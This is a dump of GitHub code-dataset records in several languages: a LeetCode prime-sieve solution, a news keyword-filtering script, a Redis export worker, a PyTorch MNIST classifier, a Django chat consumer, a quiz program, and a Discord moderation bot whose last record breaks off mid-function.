\\frac{x}{\\textit{primes}_i}\\cdot\\textit{primes}_{i+1} \nprimes \ni\n​\t\n \nx\n​\t\n ⋅primes \ni+1\n​\t\n 这个数的时候会被标记,其他同理,这保证了每个合数只会被其“最小的质因数”筛去,即每个合数被标记一次。\n\n线性筛还有其他拓展用途,有能力的读者可以搜索关键字“积性函数”继续探究如何利用线性筛来求解积性函数相关的题目。\n\nC++JavaJavaScriptGolang\n\nfunc countPrimes(n int) int {\n primes := []int{}\n isPrime := make([]bool, n)\n for i := range isPrime {\n isPrime[i] = true\n }\n for i := 2; i < n; i++ {\n if isPrime[i] {\n primes = append(primes, i)\n }\n for _, p := range primes {\n if i*p >= n {\n break\n }\n isPrime[i*p] = false\n if i%p == 0 {\n break\n }\n }\n }\n return len(primes)\n}\n\nint countPrimes(int n) {\n if (n < 2) {\n return 0;\n }\n int isPrime[n];\n int primes[n], primesSize = 0;\n memset(isPrime, 0, sizeof(isPrime));\n for (int i = 2; i < n; ++i) {\n if (!isPrime[i]) {\n primes[primesSize++] = i;\n }\n for (int j = 0; j < primesSize && i * primes[j] < n; ++j) {\n isPrime[i * primes[j]] = 1;\n if (i % primes[j] == 0) {\n break;\n }\n }\n }\n return primesSize;\n}\n复杂度分析\n\n时间复杂度:O(n)O(n)。\n\n空间复杂度:O(n)O(n)。\n\n作者:LeetCode-Solution\n链接:https://leetcode-cn.com/problems/count-primes/solution/ji-shu-zhi-shu-by-leetcode-solution/\n来源:力扣(LeetCode)\n著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n'''\n\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/math_binary/leetcode-204-CountPrimes.py","file_name":"leetcode-204-CountPrimes.py","file_ext":"py","file_size_in_byte":9051,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"764544218","text":"import Extract_noun as extract\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom vo.WssNewsNdlsWrdAnalsVO import WssNewsNdlsWrdAnalsVO\nfrom vo.NewsColctVO import NewsColctVO\nfrom vo.CodeDtstmnVO import CodeDtstmnVO\nfrom vo.WssNewsKwrdManageVO import WssNewsKwrdManageVO\nimport sqlalchemy as db\nimport logging as logging\nimport json\nimport collections as ct\nimport config\nfrom sqlalchemy.dialects.postgresql import insert\n\nlogger = logging.getLogger()\n\n# 설정 정보\nurl = config.jdbc_url\nengine = db.create_engine(config.jdbc_url)\nlimit = config.regex_limit\npage = config.regex_page\nuser_id = config.regex_user_id\n\n# session 획득\ndef get_session():\n try:\n Session = scoped_session(sessionmaker(autocommit=False, autoflush=True, expire_on_commit=False, bind=engine))\n sub_session = Session()\n return sub_session\n except Exception as e:\n logger.error(e)\n\n# session 종료\ndef close_session(session):\n try:\n session.close()\n except Exception as e:\n logger.error(e)\n finally:\n if session is not None:\n session.close()\n\n# def findStopWordList(session, stop_word_list, stopWordDict, news_nouns, news_url):\n# #뉴스 url - pk\n# ndls_wrd = dict()\n# ndls_wrd_list = []\n \n# #뉴스 본문이 없는 경우 \n# if news_nouns is None or news_nouns == 'null' or len(news_nouns) < 0: \n# return None\n \n# for k in stop_word_list :\n# vo = dict(filter(lambda elem:elem[0] == k, news_nouns.items()))\n# if len(vo) > 0 :\n# ndls_wrd_list.append(vo)\n \n# if ndls_wrd_list :\n# for r in ndls_wrd_list :\n# for k, v in r.items():\n# ndls_wrd[k] = v\n# insertStmt = insert(WssNewsNdlsWrdAnalsVO).values(\n# news_url = news_url,\n# ndls_wrd_code = stopWordDict[k],\n# ndls_wrd_cnt = v,\n# register_id = 'system',\n# rgsde = 'now()',\n# updusr_id = 'system',\n# updde = 'now()'\n# ).on_conflict_do_nothing(\n# constraint = \"pk_wss_news_ndls_wrd_anals\"\n# )\n# session.execute(insertStmt)\n \n# if len(ndls_wrd) > 0 : \n# return ndls_wrd\n# else :\n# None\n \ndef findStopWordList(session, stop_word_list, stopWordDict, news_nouns, news_url, ndlsWrdList):\n #뉴스 url - pk\n ndls_wrd = dict()\n ndls_wrd_list = []\n retList = []\n \n #뉴스 본문이 없는 경우 \n if news_nouns is None or news_nouns == 'null' or len(news_nouns) < 0: \n return None\n \n for k in stop_word_list :\n vo = dict(filter(lambda elem:elem[0] == k, news_nouns.items()))\n if len(vo) > 0 :\n ndls_wrd_list.append(vo)\n \n retList = list(map(dict, set(tuple(sorted(d.items())) for d in ndls_wrd_list)))\n \n if retList :\n for r in retList :\n for k, v in r.items():\n ndls_wrd[k] = v\n ndlsWrdList.append(dict(\n news_url = news_url,\n ndls_wrd_code = stopWordDict[k],\n ndls_wrd_cnt = v,\n register_id = 'system',\n rgsde = 'now()',\n updusr_id = 'system',\n updde = 'now()'\n ))\n if len(ndls_wrd) > 0 : \n return ndls_wrd\n else :\n None\n\ndef insertComptAt(session, news_url) :\n try:\n t_obj = dict()\n t_obj['news_url'] = news_url\n t_obj['ndls_wrd_anals_compt_at'] = \"Y\"\n session.query(NewsColctVO).filter(NewsColctVO.news_url == t_obj['news_url']).update(t_obj)\n session.commit\n \n except Exception as e:\n raise e\n\ndef comptUpdateVO(news_url) :\n try:\n t_obj = dict()\n t_obj['news_url'] = news_url\n t_obj['ndls_wrd_anals_compt_at'] = \"Y\"\n return t_obj\n \n except Exception as e:\n raise e\n \ndef comptUpdateNdlsWrdVO(news_url, ndls_wrd) :\n try:\n t_obj = dict()\n t_obj['news_url'] = news_url\n t_obj['ndls_wrd_anals_compt_at'] = \"Y\"\n if (ndls_wrd is not None and len(ndls_wrd) > 0 ) : t_obj['ndls_wrd'] = json.dumps(ndls_wrd, ensure_ascii=False)\n return t_obj\n \n except Exception as e:\n raise e\n\n\ndef main():\n try:\n print(\"start\")\n \n stop_word_list = []\n stopWordDict = dict()\n extract_noun = extract.Extract_noun(\"ndls_wrd\")\n\n session = get_session()\n session.begin()\n \n record = 0\n global page, limit, user_id\n\n if bool(limit) != True:\n raise Exception(\"설정 오류\")\n\n # 뉴스 목록\n news_rs = session.query(NewsColctVO).where((NewsColctVO.ndls_wrd_anals_compt_at == \"N\" and (NewsColctVO.ndls_wrd_anals_compt_at == \"Y\" and NewsColctVO.news_bdt != 'null' and NewsColctVO.news_bdt is not None)))\n # 키워드 관리번호\n manage_vo = session.query(WssNewsKwrdManageVO).where(WssNewsKwrdManageVO.use_yn == 'Y', WssNewsKwrdManageVO.delete_yn == 'N').one()\n \n\n # 키워드 제외 항목\n stop_word_cur = session.query(CodeDtstmnVO).where(CodeDtstmnVO.code_usgstt == '1', CodeDtstmnVO.code_column_nm == 'ndls_wrd')\n\n for word_obj in stop_word_cur:\n stopWordDict[word_obj.code_dc] = word_obj.code_no\n stop_word_list.append(word_obj.code_dc)\n\n record = news_rs.limit(limit).all()\n \n while record :\n print(\"start loop\")\n \n ndlsWrdList = []\n comptUpdateList = []\n \n for row in record:\n \n print(\"row : \", row)\n news_nouns_dict = None\n news_url = row.news_url\n \n if row.news_noun is not None and len(row.news_noun) > 0 :\n news_nouns_dict = row.news_noun\n else :\n if row.news_bdt is None or row.news_bdt == 'null' or len(row.news_bdt) < 1 :\n comptUpdateList.append(comptUpdateVO(news_url))\n # insertComptAt(session, row.news_url)\n continue\n \n news_nouns = extract_noun.getNouns(row.news_bdt)\n \n if news_nouns is None or len(news_nouns) < 1 :\n comptUpdateList.append(comptUpdateVO(news_url))\n # insertComptAt(session, row.news_url)\n continue\n\n news_nouns_dict = extract_noun.getNounsCntDict(news_nouns)\n \n if news_nouns_dict is not None and len(news_nouns_dict) > 0 : \n # 등록된 제외단어가 포함된 뉴스는 제외\n ndls_wrd = findStopWordList(session, stop_word_list, stopWordDict, news_nouns_dict, news_url, ndlsWrdList)\n else :\n comptUpdateList.append(comptUpdateVO(news_url))\n continue\n \n comptUpdateList.append(comptUpdateNdlsWrdVO(news_url, ndls_wrd))\n # t_obj = dict()\n # t_obj['news_url'] = row.news_url\n # t_obj['ndls_wrd_anals_compt_at'] = \"Y\"\n # if (ndls_wrd is not None and len(ndls_wrd) > 0 ) : t_obj['ndls_wrd'] = json.dumps(ndls_wrd, ensure_ascii=False)\n # session.query(NewsColctVO).filter(NewsColctVO.news_url == t_obj['news_url']).update(t_obj)\n # session.commit()\n \n session.bulk_insert_mappings(WssNewsNdlsWrdAnalsVO, ndlsWrdList)\n session.bulk_update_mappings(NewsColctVO, comptUpdateList)\n session.commit()\n \n \n print(\"end loop : \", page)\n page = page+1\n record = news_rs.limit(limit).all()\n\n session.close()\n\n logger.info(\"--------------- 종료 ------------------------\")\n except UnicodeDecodeError as ed :\n session.rollback()\n print (ed)\n raise ed\n except Exception as e:\n session.rollback()\n print (e)\n raise e\n finally:\n close_session(session)\n\nif __name__ == '__main__' :\n main()","repo_name":"Moon012/reservoir_project","sub_path":"news_except_ndls_wrd.py","file_name":"news_except_ndls_wrd.py","file_ext":"py","file_size_in_byte":8416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5432258936","text":"from redis_helper import redis_helper\nimport redis\nimport export_request\nfrom export import export_to_zip\nimport db_helper\nimport upload_to_spaces\nimport mail_user\nimport shutil\n\npg_pool = db_helper.get_pg_pool()\n\ndef process_export_task(data):\n conn = pg_pool.getconn()\n request = export_request.ExportRequest.parse_raw(data)\n print(\"Received request: \", request)\n\n zip_file_location, dir_export = export_to_zip.generate_zip(conn, request.query_parameters)\n pg_pool.putconn(conn)\n \n download_url = upload_to_spaces.upload_to_spaces(zip_file_location)\n mail_user.mail_download_link(request.email, download_url)\n print(\"Finished request\")\n # clean up files.\n shutil.rmtree(dir_export)\n\ndef wait_on_export_task(r: redis.Redis):\n while True:\n message = r.blpop(\"export_raw_data_tasks\", 30)\n if message:\n data = message[1]\n process_export_task(data)\n\nwhile True:\n with redis_helper.get_resource() as r:\n wait_on_export_task(r)","repo_name":"Stichting-CROW/dd-raw-data-exporter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7093073090","text":"# 导入必要的库\nimport torch\nimport torch.nn as nn\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\n\n# 定义超参数\nnum_epochs = 5 # 训练轮数\nbatch_size = 100 # 批大小\nlearning_rate = 0.001 # 学习率\n\n# 加载MNIST数据集,将图片转换为张量并归一化到[0,1]区间\ntrain_dataset = datasets.MNIST(\n root=\"./data\", train=True, transform=transforms.ToTensor(), download=True\n)\n\ntest_dataset = datasets.MNIST(\n root=\"./data\", train=False, transform=transforms.ToTensor()\n)\n\n# 创建数据加载器,将数据集分成多个批次进行训练和测试\ntrain_loader = torch.utils.data.DataLoader(\n dataset=train_dataset, batch_size=batch_size, shuffle=True\n)\n\ntest_loader = torch.utils.data.DataLoader(\n dataset=test_dataset, batch_size=batch_size, shuffle=False\n)\n\n\n# 定义CNN模型,包含两个卷积层和两个全连接层\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN, self).__init__()\n # 第一个卷积层,输入通道为1(灰度图),输出通道为16,卷积核大小为5x5,步长为1,填充为2(保持尺寸不变)\n self.conv1 = nn.Conv2d(1, 16, kernel_size=5, stride=1, padding=2)\n # 第一个池化层,使用最大池化,核大小为2x2,步长为2(下采样)\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n # 第二个卷积层,输入通道为16,输出通道为32,卷积核大小为5x5,步长为1,填充为2(保持尺寸不变)\n self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=1, padding=2)\n # 第一个全连接层,输入特征维度为7x7x32(经过两次池化后的图片尺寸),输出特征维度为10(类别数)\n self.fc1 = nn.Linear(7 * 7 * 32, 10)\n\n def forward(self, x):\n # 前向传播函数,定义模型的计算流程\n out = self.conv1(x) # 卷积操作\n out = torch.relu(out) # 激活函数\n out = self.pool(out) # 池化操作\n out = self.conv2(out) # 卷积操作\n out = torch.relu(out) # 激活函数\n out = self.pool(out) # 池化操作\n\n out = out.reshape(out.size(0), -1) # 将四维张量展平成二维张量\n\n out = self.fc1(out) # 全连接操作\n\n return out\n\n\n# 创建CNN模型实例,并移动到GPU上(如果有GPU的话)\nmodel = CNN()\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel.to(device)\n\n# 定义损失函数和优化器\ncriterion = nn.CrossEntropyLoss() # 使用交叉熵损失函数作为分类问题的损失函数\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) # 使用Adam优化器作为优化算法\n\n# 训练模型\n\ntotal_step = len(train_loader) # 计算总的批次数\n\nfor epoch in range(num_epochs): # 遍历每一轮训练\n for i, (images, labels) in enumerate(train_loader): # 遍历每一个批次的数据\n images = images.to(device) # 将图片张量移动到GPU上(如果有GPU的话)\n labels = labels.to(device) # 将标签张量移动到GPU上(如果有GPU的话)\n\n outputs = model(images) # 前向传播,得到模型输出\n loss = criterion(outputs, labels) # 计算损失\n\n optimizer.zero_grad() # 清空梯度缓存\n loss.backward() # 反向传播,计算梯度\n optimizer.step() # 更新参数\n\n if (i + 1) % 100 == 0: # 每隔100个批次打印一次训练信息\n print(\n \"Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}\".format(\n epoch + 1, num_epochs, i + 1, total_step, loss.item()\n )\n )\n\n# 测试模型\n\nmodel.eval() # 将模型设置为评估模式,关闭dropout等影响测试结果的因素\n\nwith torch.no_grad(): # 关闭自动求导,节省内存和计算资源\n correct = 0 # 正确预测的数量\n total = 0 # 总的样本数量\n\n for images, labels in test_loader: # 遍历测试集中的每一个批次\n images = images.to(device) # 将图片张量移动到GPU上(如果有GPU的话)\n labels = labels.to(device) # 将标签张量移动到GPU上(如果有GPU的话)\n\n outputs = model(images) # 前向传播,得到模型输出\n _, predicted = torch.max(outputs.data, 1) # 得到预测结果,取每一行最大值对应的索引作为类别\n\n total += labels.size(0) # 累加总样本数\n correct += (predicted == labels).sum().item() # 累加正确预测数\n\n print(\n \"Test Accuracy of the model on the 10000 test images: {} %\".format(\n 100 * correct / total\n )\n )\n\n# 保存模型\ntorch.save(model.state_dict(), \"model.ckpt\")\n","repo_name":"Leokiko/Python-L","sub_path":"day1-15/CNN_pytorch.py","file_name":"CNN_pytorch.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70904189172","text":"import json\n\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nfrom django.contrib.auth import get_user_model\n\nfrom messenger.models import Message\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n current_user_id = self.scope['user'].id\n other_user_id = self.scope['url_route']['kwargs']['id']\n self.room_name = (\n f'{current_user_id}_{other_user_id}'\n if int(current_user_id) > int(other_user_id)\n else f'{other_user_id}_{current_user_id}'\n )\n self.room_group_name = f'chat_{self.room_name}'\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n await self.accept()\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(self.room_group_name, self.channel_layer)\n await self.disconnect(close_code)\n\n async def receive(self, text_data=None, bytes_data=None):\n data = json.loads(text_data)\n message = data['message']\n sender_username = data['username']\n receiver_username = data['receiver']\n\n receiver = await self.get_user(receiver_username)\n sender = await self.get_user(sender_username)\n\n await self.save_message(sender=sender, receiver=receiver, message=message, thread_name=self.room_group_name)\n\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'message': message,\n 'senderUsername': sender_username,\n },\n )\n\n async def chat_message(self, event):\n message = event['message']\n username = event['senderUsername']\n\n await self.send(\n text_data=json.dumps(\n {\n 'message': message,\n 'senderUsername': username,\n }\n )\n )\n\n @database_sync_to_async\n def get_user(self, username):\n return get_user_model().objects.filter(username=username).first()\n\n @database_sync_to_async\n def save_message(self, sender, receiver, message, thread_name):\n Message.objects.create(\n sender=sender, receiver=receiver, message=message, thread_name=thread_name)\n","repo_name":"fedenazar97/Chat","sub_path":"messenger/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8414193879","text":"#escreva um programa em\n#Python que realize o cadastro de questões objetivas para uma prova\n#com suas respectivas respostas.\n#Na sequência o programa deve solicitar as respostas para cada questão\n#e imprimir o resultado (acertos e erros). O programa deve permitir que\n#mais de uma pessoa informe as respostas, até que digite SAIR.\n\nimport os\n\nquestoes = {}\nusuarios = {}\n\ndef limpar_terminal():\n os.system('cls' if os.name == 'nt' else 'clear')\n\ndef cadastrar_questao():\n limpar_terminal()\n\n enunciado = input('Informe o enunciado da questão: ')\n letra_a = input(\"Informe a letra A da questão: \")\n letra_b = input(\"Informe a Letra B da questão: \")\n letra_c = input(\"Informe a Letra C da questão: \")\n letra_d = input(\"Informe a Letra D da questão: \")\n\n gabarito = input(\"Infome o gabarito (a, b, c ou d): \")\n while gabarito not in [\"a\", \"b\", \"c\", \"d\"]:\n print(\"Informe um gabarito válido.\")\n gabarito = input(\"Infome o gabarito (a, b, c ou d): \")\n\n questoes[enunciado] = {\n \"enunciado\": enunciado,\n \"alternativas\":{\n \"letra_a\": letra_a,\n \"letra_b\": letra_b,\n \"letra_c\": letra_c,\n \"letra_d\": letra_d},\n \"gabarito\":gabarito}\n\n print(questoes)\n\ndef responder_questoes():\n limpar_terminal()\n\n for nome, usuario in usuarios.items():\n print(f\"\\nAgora é a vez de: {usuario['nome']}\")\n for pergunta, resposta in questoes.items():\n print(\"\\n\")\n print(f\"Pergunta: {pergunta}\")\n print(\"a - \"+ resposta[\"alternativas\"][\"letra_a\"])\n print(\"b - \"+ resposta[\"alternativas\"][\"letra_b\"])\n print(\"c - \"+ resposta[\"alternativas\"][\"letra_c\"])\n print(\"d - \"+ resposta[\"alternativas\"][\"letra_d\"])\n\n resposta_usuario = input(\"\\nInforme a resposta (a, b, c ou d): \")\n while resposta_usuario not in [\"a\", \"b\", \"c\", \"d\"]:\n print(\"Informe uma resposta válida.\")\n resposta_usuario = input(\"\\nInforme a resposta (a, b, c ou d): \")\n\n if resposta_usuario == resposta[\"gabarito\"]:\n print(\"Resposta correta\")\n usuario['acertos'] += 1\n else:\n print(\"Resposta errada\")\n print(f\"Resposta correta : {resposta['gabarito']}\")\n usuario['erros'] += 1\n\n print(f\"{usuario['nome']} acertou {usuario['acertos']} questões e errou {usuario['erros']} questões.\")\n usuario['acertos'] = 0\n usuario['erros'] = 0\n\ndef ListarQuestoes():\n limpar_terminal()\n for pergunta, resposta in questoes.items():\n print(pergunta)\n print(\"\\n\")\n print(\"Deseja sair ?\")\n print(\"1 - Sim\")\n print(\"2 - Não\")\n opcao = input(\"Informe a opção: \")\n if opcao == \"1\":\n limpar_terminal()\n else:\n limpar_terminal()\n ListarQuestoes() \n\ndef cadastrar_usuario():\n limpar_terminal()\n\n nome = input(\"Informe o nome: \")\n usuarios[nome] = {\n \"nome\": nome,\n \"acertos\": 0,\n \"erros\": 0\n } \n\ndef IniciaPrograma():\n while True:\n limpar_terminal()\n\n print(\"\\n1. Cadastrar questão\")\n print(\"2. Responder questões\")\n print(\"3. Listar questões\")\n print(\"4. Cadastrar usuario\")\n opcao_selecionada= input(\"\\nInforma a opcao: \")\n\n if opcao_selecionada ==\"1\":\n cadastrar_questao()\n elif opcao_selecionada == \"2\":\n responder_questoes()\n elif opcao_selecionada == \"3\":\n ListarQuestoes() \n elif opcao_selecionada == \"4\":\n cadastrar_usuario() \n else:\n break\n\nIniciaPrograma()\n","repo_name":"wellbritto98/Atividades-Primeira-Unidade","sub_path":"questões.py","file_name":"questões.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12386893479","text":"import time, threading\n\n'''\n simulate javascript set interval. gotten from: https://stackoverflow.com/questions/2697039/python-equivalent-of-setinterval\n'''\n\n\nclass SetInterval :\n def __init__(self, interval: int, action, generate_params) :\n self.interval = interval\n self.action = action\n self.generate_params = generate_params\n self.stopEvent = threading.Event()\n thread=threading.Thread(target = self.__setInterval)\n thread.start()\n\n def __setInterval(self) :\n nextTime=time.time()+self.interval\n while not self.stopEvent.wait(nextTime-time.time()) :\n nextTime+=self.interval\n self.action(self.generate_params())\n\n def cancel(self) :\n self.stopEvent.set()","repo_name":"Jorgeewa/data-pipeline","sub_path":"robot/interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12952078796","text":"import disnake\r\nfrom disnake.ext import commands\r\nfrom random import randint, random\r\nfrom disnake import Option\r\nimport sqlite3\r\nfrom datetime import datetime\r\n\r\n\r\nconn = sqlite3.connect('bans.db')\r\nc = conn.cursor()\r\n\r\nconn = sqlite3.connect('warn.db')\r\nc = conn.cursor()\r\n\r\nc.execute('''CREATE TABLE IF NOT EXISTS warnings\r\n (user_id INTEGER PRIMARY KEY, num_warnings INTEGER)''')\r\n\r\nconn = sqlite3.connect('black-list-words.db')\r\nc = conn.cursor()\r\n\r\nc.execute(\"CREATE TABLE IF NOT EXISTS bad_words (word TEXT)\")\r\n\r\n\r\n\r\nclass admins(commands.Cog):\r\n def __init__(self, bot: commands.Bot):\r\n self.bot = bot\r\n\r\n\r\n @commands.slash_command(name=\"kick\", description=\"Выгнать пользователя с сервера.\")\r\n @commands.has_permissions(kick_members=True)\r\n async def kick_user(self, ctx: disnake.ApplicationCommandInteraction, user: disnake.Member, reason: str = None):\r\n\r\n if user.top_role >= ctx.author.top_role:\r\n await ctx.send(\"Вы не можете кикнуть пользователя с более высокой или равной ролью.\")\r\n return\r\n\r\n await user.kick(reason=reason)\r\n try:\r\n await user.send(f\"Вы были кикнуты с сервера {ctx.guild.name}. Причина: {reason}\")\r\n except disnake.errors.HTTPException:\r\n pass\r\n embed = disnake.Embed(color=0xCD853F)\r\n embed.add_field(name=\"Kick\", value=f\"{ctx.author.mention} кикнула {user.mention} из {ctx.guild} сервера 😔\")\r\n embed.add_field(name=\"Причина\", value=reason if reason else \"Не указана\")\r\n\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n\r\n @commands.slash_command(name='clear', description='Очистить чат')\r\n async def clear(self, ctx, amount: int):\r\n if not ctx.author.guild_permissions.manage_messages:\r\n raise commands.CheckFailure\r\n\r\n if amount > 1000:\r\n await ctx.send('Кискис нельзя удалить больше 1000 сообщений за раз.')\r\n return\r\n\r\n deleted = await ctx.channel.purge(limit=amount)\r\n embed = disnake.Embed(color=0xCD853F)\r\n embed.add_field(name=\"Очистила чат\", value=f\"Удалила {len(deleted)} сообщений 😊\", inline=False)\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n \r\n @commands.slash_command(name=\"ban\", description=\"Забанить пользователя.\")\r\n @commands.has_permissions(ban_members=True)\r\n async def ban_user(self, ctx, user: disnake.Member, reason: str = None):\r\n conn = sqlite3.connect('bans.db')\r\n c = conn.cursor()\r\n c.execute(\"SELECT user_id FROM bans WHERE user_id=?\", (user.id,))\r\n banned_user = c.fetchone()\r\n\r\n if banned_user:\r\n embed = disnake.Embed(title=\"Бан\", description=f\"{user.mention} Этот пользов��тель уже забанен.\", color=0xCD853F)\r\n else:\r\n await user.ban(reason=reason)\r\n c.execute(\"INSERT INTO bans (user_id, username, reason) VALUES (?, ?, ?)\", (user.id, user.name, reason))\r\n conn.commit()\r\n embed = disnake.Embed(title=\"Бан\", description=f\"{user.mention} Я забанила эту хамку.😤\", color=0xCD853F)\r\n try:\r\n await user.send(embed=embed)\r\n except disnake.errors.HTTPException:\r\n pass\r\n\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n @commands.slash_command(name=\"unban\", description=\"Разбанить пользователя.\")\r\n @commands.has_permissions(ban_members=True)\r\n async def unban_user(self, ctx, user: disnake.User, reason: str = None):\r\n banned_users = await ctx.guild.bans()\r\n user_name, user_discriminator = user.name, user.discriminator\r\n\r\n for banned_entry in banned_users:\r\n banned_user = banned_entry.user\r\n if (banned_user.name, banned_user.discriminator) == (user_name, user_discriminator):\r\n await ctx.guild.unban(banned_user, reason=reason)\r\n conn = sqlite3.connect('bans.db')\r\n c = conn.cursor()\r\n c.execute(\"DELETE FROM bans WHERE user_id=?\", (banned_user.id,))\r\n conn.commit()\r\n embed = disnake.Embed(title=\"Разбан\", description=f\"{banned_user.mention} был успешно разбанен.\", color=0xCD853F)\r\n try:\r\n await banned_user.send(embed=embed)\r\n except disnake.errors.HTTPException:\r\n pass\r\n \r\n await ctx.send(embed=embed, ephemeral=True)\r\n return\r\n\r\n\r\n\r\n @commands.slash_command(name=\"message_bot\", description=\"Отправить сообщение от имени Полины.\")\r\n @commands.has_permissions(administrator=True)\r\n async def echo(self, ctx: disnake.ApplicationCommandInteraction, channel: disnake.TextChannel, role: disnake.Role, *, message: str):\r\n message = message.replace(\"-\", \"\\n\")\r\n embed = disnake.Embed(color=0xCD853F)\r\n embed.add_field(name=\"\", value=message, inline=False)\r\n\r\n role_mention = role.mention\r\n\r\n message_with_role = f\"{role_mention}\"\r\n\r\n await channel.send(embed=embed, content=message_with_role)\r\n\r\n\r\n\r\n\r\n @commands.slash_command(name='join', description='Зайти в голосовой канал')\r\n @commands.has_permissions(administrator=True)\r\n async def join(ctx: disnake.ApplicationCommandInteraction):\r\n if not ctx.author.voice:\r\n embed = disnake.Embed(\r\n color=0xe21212,\r\n title=\"Ошибка\",\r\n description=\"Ты должен находиться в голосовом канале для использования этой команды\"\r\n )\r\n await ctx.send(embed=embed, ephemeral=True)\r\n return\r\n\r\n channel = ctx.author.voice.channel\r\n await channel.connect()\r\n embed = disnake.Embed(\r\n color=0xCD853F,\r\n title=\"Готово\",\r\n description=f\"Успешно подключилась к голосовому каналу {channel.name}\"\r\n )\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n voice_channel = ctx.author.voice.channel\r\n embed = disnake.Embed(color=0xCD853F)\r\n embed.add_field(name=\"voice\", value=voice_channel.name, inline=False)\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n\r\n\r\n\r\n @commands.slash_command(name='leave', description='Выйти из голосового канала')\r\n @commands.has_permissions(administrator=True)\r\n async def leave(ctx: disnake.ApplicationCommandInteraction):\r\n if not ctx.guild.voice_client:\r\n embed = disnake.Embed(\r\n color=0xCD853F,\r\n title=\"Ошибка\",\r\n description=\"Я не нахожусь в голосовом канале\"\r\n )\r\n await ctx.response.send_message(embed=embed, ephemeral=True)\r\n return\r\n\r\n await ctx.guild.voice_client.disconnect()\r\n embed = disnake.Embed(\r\n color=0xCD853F,\r\n title=\"Готово\",\r\n description=\"Успешно отключилась от голосового канала\"\r\n )\r\n await ctx.response.send_message(embed=embed, ephemeral=True)\r\n\r\n\r\n\r\n @commands.slash_command(name='stay', description='Оставаться Полине в голосовом канале')\r\n @commands.has_permissions(administrator=True)\r\n async def stay(ctx):\r\n if not ctx.author.voice:\r\n embed = disnake.Embed(\r\n color=0xCD853F,\r\n title=\"Ошибка\",\r\n description=\"Вы должны находиться в голосовом канале, чтобы использовать эту команду.\"\r\n )\r\n await ctx.send(embed=embed, ephemeral=True)\r\n return\r\n\r\n vc = ctx.author.voice.channel\r\n voice_client = ctx.guild.voice_client\r\n if voice_client and voice_client.is_connected():\r\n await voice_client.move_to(vc)\r\n embed = disnake.Embed(\r\n color=0xCD853F,\r\n title=\"Готово\",\r\n description=f'Я останусь в голосовом канале \"{vc.name}\" до тех пор, пока меня не попросят выйти. Для этого напиши /leave.'\r\n )\r\n else:\r\n voice_client = await vc.connect()\r\n embed = disnake.Embed(\r\n color=0xCD853F,\r\n title=\"Готово\",\r\n description=\"Удачно зашла в голосовой канал.\"\r\n )\r\n\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n @commands.slash_command(name='create_role', description='Создание новой роли')\r\n @commands.has_permissions(administrator=True)\r\n async def create_role(ctx, name: str):\r\n guild = ctx.guild\r\n role = await guild.create_role(name=name)\r\n embed = disnake.Embed(\r\n title='Роль создана',\r\n description=f'Новая роль {role.mention} была создана!',\r\n color=0xCD853F\r\n )\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n @commands.slash_command(name='assign_role', description='Выдача роли пользователю')\r\n @commands.has_permissions(administrator=True)\r\n async def assign_role(ctx, role: disnake.Role, member: disnake.Member):\r\n await member.add_roles(role)\r\n embed = disnake.Embed(\r\n title='Роль добавлена',\r\n description=f'Пользователю {member.mention} была выдана роль {role.mention}!',\r\n color=0xCD853F\r\n )\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n @commands.slash_command(name='remove_role', description='Удаление роли у пользователя')\r\n @commands.has_permissions(administrator=True)\r\n async def remove_role(ctx, role: disnake.Role, member: disnake.Member):\r\n await member.remove_roles(role)\r\n embed = disnake.Embed(\r\n title='Роль удалена',\r\n description=f'У пользователя {member.mention} была удалена роль {role.mention}!',\r\n color=0xCD853F\r\n )\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n\r\n @commands.slash_command(name=\"setnick\", description=\"Сменить никнейм участнику.\")\r\n @commands.has_permissions(administrator=True)\r\n async def set_nickname(self, ctx, member: disnake.Member, new_nickname: str):\r\n await member.edit(nick=new_nickname)\r\n embed = disnake.Embed(\r\n title=\"Изменение никнейма :pen_ballpoint:\",\r\n description=f\"Никнейм участника {member.mention} был изменен на {new_nickname}.\",\r\n color=0xCD853F\r\n )\r\n await ctx.send(embed=embed, 